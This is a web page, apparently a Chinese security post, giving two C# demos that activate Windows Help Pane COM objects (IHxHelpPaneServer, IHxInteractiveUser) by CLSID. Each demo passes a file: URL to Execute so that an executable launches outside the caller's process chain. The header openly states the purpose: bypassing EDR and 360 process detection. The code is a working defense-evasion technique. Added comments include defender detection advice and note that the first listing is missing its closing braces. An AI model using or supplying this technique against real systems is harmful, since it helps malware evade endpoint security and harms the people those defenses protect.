COM进程断链demo,用于打断进程链信任,绕过edr检测,360进程检测等,懂的都懂
IHxHelpPaneServer接口
using System;
using System.Runtime.InteropServices;

namespace TestHelpPanel
{
    /// <summary>
    /// COM import of the Windows Help Pane server interface, identified by the IID in the
    /// <see cref="GuidAttribute"/> below. Only <see cref="Execute"/> is called from
    /// <c>Program.Main</c>; the other members are declared so that the member order matches
    /// the native vtable (for an <c>InterfaceIsIUnknown</c> import the declaration order
    /// defines the slot each call is dispatched to, so reordering them would break the call).
    /// </summary>
    [Guid("8CEC592C-07A1-11D9-B15E-000D56BFE6EE")]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    [ComImport]
    public interface IHxHelpPaneServer
    {
        /// <param name="bstrUrl">Marshalled as a BSTR; not used by this demo.</param>
        void DisplayTask([MarshalAs(UnmanagedType.BStr)] string bstrUrl);
        /// <param name="bstrUrl">Marshalled as a BSTR; not used by this demo.</param>
        void DisplayContents([MarshalAs(UnmanagedType.BStr)] string bstrUrl);
        /// <param name="bstrSearchQuery">Marshalled as a BSTR; not used by this demo.</param>
        void DisplaySearchResults([MarshalAs(UnmanagedType.BStr)] string bstrSearchQuery);
        /// <summary>The only member the demo invokes; the COM server receives a URL string.</summary>
        /// <param name="pcUrl">Marshalled as LPWSTR (UTF-16, null-terminated).</param>
        void Execute([MarshalAs(UnmanagedType.LPWStr)] string pcUrl);
    }

    class Program
    {
        /// <summary>
        /// Demo entry point: resolves the coclass by CLSID, activates it, and passes a
        /// <c>file:</c> URL to <see cref="IHxHelpPaneServer.Execute"/>. <paramref name="args"/>
        /// is not read.
        /// </summary>
        /// <remarks>
        /// Defender note: the URL is handed to a COM server rather than launched by this
        /// process, so (per the page header) the resulting process presumably does not have
        /// this executable as its parent — confirm on the target OS. Detections that rely on
        /// parent/child lineage alone would miss it; correlating activation of this CLSID with
        /// the subsequent process creation from a <c>file:</c> URL is the more robust signal.
        /// </remarks>
        static void Main(string[] args)
        {
            // CLSID of the coclass that implements IHxHelpPaneServer (value as given on the page).
            Type tp = Type.GetTypeFromCLSID(new Guid("8CEC58AE-07A1-11D9-B15E-000D56BFE6EE"));
            // NOTE(review): `as` yields null if the activated object does not expose the
            // interface; the Execute call below would then throw NullReferenceException.
            IHxHelpPaneServer helpPane = Activator.CreateInstance(tp) as IHxHelpPaneServer;
            // Hard-coded placeholder path from the original demo; the COM server decides what
            // to do with a file: URL.
            string fileUrl = "file:///D:/cccc.exe";
            helpPane.Execute(fileUrl);
        }
        // NOTE(review): the listing as pasted ends here — the closing braces for class Program
        // and namespace TestHelpPanel are missing from the page.
IHxInteractiveUser接口
// Second variant on the page: it declares the same namespace and Program class as the
// IHxHelpPaneServer listing above, so the two are alternatives, not files of one project.
// Only System, System.Runtime.CompilerServices and System.Runtime.InteropServices are used
// here; the remaining usings appear unused in this listing.
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;

namespace TestHelpPanel
{
    /// <summary>
    /// COM import of a second Help Pane interface (IID from the <see cref="GuidAttribute"/>
    /// below) that exposes a single <see cref="Execute"/> member taking a URL. The
    /// <c>TypeLibType</c> flags mark it hidden and OLE-automation compatible in the type
    /// library; <c>MethodImpl(InternalCall)</c> is the usual marking for a runtime-dispatched
    /// COM vtable call.
    /// </summary>
    [Guid("8CEC595B-07A1-11D9-B15E-000D56BFE6EE")]
    [TypeLibType(TypeLibTypeFlags.FHidden | TypeLibTypeFlags.FOleAutomation)]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    [ComImport]
    public interface IHxInteractiveUser
    {
        /// <summary>The member the demo invokes; the COM server receives a URL string.</summary>
        /// <param name="pcUrl">Marshalled as LPWSTR (UTF-16, null-terminated), input only.</param>
        [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
        void Execute([MarshalAs(UnmanagedType.LPWStr), In] string pcUrl);
    }

    class Program
    {
        /// <summary>
        /// Demo entry point: resolves the coclass by CLSID, activates it, and passes a
        /// <c>file:</c> URL to <see cref="IHxInteractiveUser.Execute"/>. <paramref name="args"/>
        /// is not read.
        /// </summary>
        /// <remarks>
        /// Defender note: as with the first variant, the launch is delegated to a COM server,
        /// so the resulting process presumably does not have this executable as its parent
        /// (inferred from the page header — confirm on the target OS). Correlate activation of
        /// this CLSID with the subsequent process creation rather than relying on lineage alone.
        /// </remarks>
        static void Main(string[] args)
        {
            // CLSID of the coclass that implements IHxInteractiveUser (value as given on the page).
            Type tp = Type.GetTypeFromCLSID(new Guid("8CEC58E7-07A1-11D9-B15E-000D56BFE6EE"));
            // NOTE(review): `as` yields null if the activated object does not expose the
            // interface; the Execute call below would then throw NullReferenceException.
            IHxInteractiveUser pn = Activator.CreateInstance(tp) as IHxInteractiveUser;
            // Hard-coded placeholder path from the original demo.
            string file = "file:///D:/cccc.exe";
            pn.Execute(file);
        }
    }
}